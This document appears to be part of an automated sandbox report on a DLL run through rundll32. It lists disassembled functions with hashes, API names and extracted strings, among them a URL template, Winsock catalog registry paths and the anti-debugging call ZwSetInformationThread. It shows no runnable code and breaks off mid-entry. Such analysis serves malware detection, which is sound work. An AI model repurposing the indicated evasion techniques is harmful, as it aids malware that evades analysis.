                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180072640 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                  • Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
                                                                  • Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                  • Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180072700 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                  • Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
                                                                  • Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                  • Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800543E4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$??3@
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                  • API String ID: 1245774677-2131870787
                                                                  • Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                  • Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
                                                                  • Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                  • Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800546E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$??3@
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                  • API String ID: 1245774677-2131870787
                                                                  • Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                  • Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
                                                                  • Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                  • Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000C374 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140synchronizationtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileMutexReleaseSystem
                                                                  • String ID: %I64d$__LastModified__
                                                                  • API String ID: 4233779698-1650611527
                                                                  • Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                  • Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
                                                                  • Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                  • Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180011110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                  • String ID: dfafidjalkfjdalksjfjklfads
                                                                  • API String ID: 3302636555-1647371548
                                                                  • Opcode ID: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                  • Instruction ID: 983dc216bf69003e419ddceaeab5995bac8f8453ed4f95b95033b7c069322061
                                                                  • Opcode Fuzzy Hash: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                  • Instruction Fuzzy Hash: 27515F32701E488AEB55DF65D8807CD33A0F789BD8F448229EA2D47BA5DF38C619C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180048BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcessString_vsnwprintf_smemset
                                                                  • String ID: com$error_code
                                                                  • API String ID: 3912638396-1490343999
                                                                  • Opcode ID: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
                                                                  • Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
                                                                  • Opcode Fuzzy Hash: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
                                                                  • Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000D00C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                  • String ID: http://%s/wcheckquery
                                                                  • API String ID: 1980634866-481256882
                                                                  • Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                  • Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
                                                                  • Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                  • Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180074740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96sleeplibraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorLastProcSleep
                                                                  • String ID: InitOnceExecuteOnce
                                                                  • API String ID: 299661913-4081768745
                                                                  • Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                  • Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
                                                                  • Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                  • Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180042088 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: emc$mpt$nct
                                                                  • API String ID: 0-4018135154
                                                                  • Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                  • Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
                                                                  • Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                  • Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005CCA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: NTDLL.DLL$ZwSetInformationThread
                                                                  • API String ID: 1646373207-2735485441
                                                                  • Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                  • Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
                                                                  • Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                  • Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005F014 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease
                                                                  • String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
                                                                  • API String ID: 1638419-14785165
                                                                  • Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                  • Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
                                                                  • Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                  • Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005C9F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value_time64
                                                                  • String ID: MsgCenter$opentime_afterupdate
                                                                  • API String ID: 785988768-2434204715
                                                                  • Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                  • Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
                                                                  • Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                  • Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005CDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@_wcslwrmemset
                                                                  • String ID: Global\QIHOO360_%s
                                                                  • API String ID: 2483156104-3710684550
                                                                  • Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                  • Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
                                                                  • Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                  • Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005B1FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$AddressHandleModuleProc
                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                  • API String ID: 1929421221-2252518459
                                                                  • Opcode ID: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
                                                                  • Instruction ID: b7589bd7c9edc25a710676dc7680ca351ec7a130bddfa3bcd3ac7e714d28a79a
                                                                  • Opcode Fuzzy Hash: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
                                                                  • Instruction Fuzzy Hash: 5B216F72214A4882E751DF68E84478AB760FB897F4F408301F5BD53AE9DF78C299CB45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005B0F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                  • API String ID: 3702945584-2252518459
                                                                  • Opcode ID: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                  • Instruction ID: 822726540527e7bff4823bd2222deb8b26a33040d1884c58a740bbbc5b89d818
                                                                  • Opcode Fuzzy Hash: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                  • Instruction Fuzzy Hash: A631C476201B488AEBA18F25D8443D937A4F7487ACF418715EA6C02BE8EF38C258C784
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006A4C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$LocalSystemsscanf
                                                                  • String ID: %hu-%hu-%hu %hu:%hu:%hu
                                                                  • API String ID: 34346384-1004895946
                                                                  • Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                  • Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
                                                                  • Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                  • Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
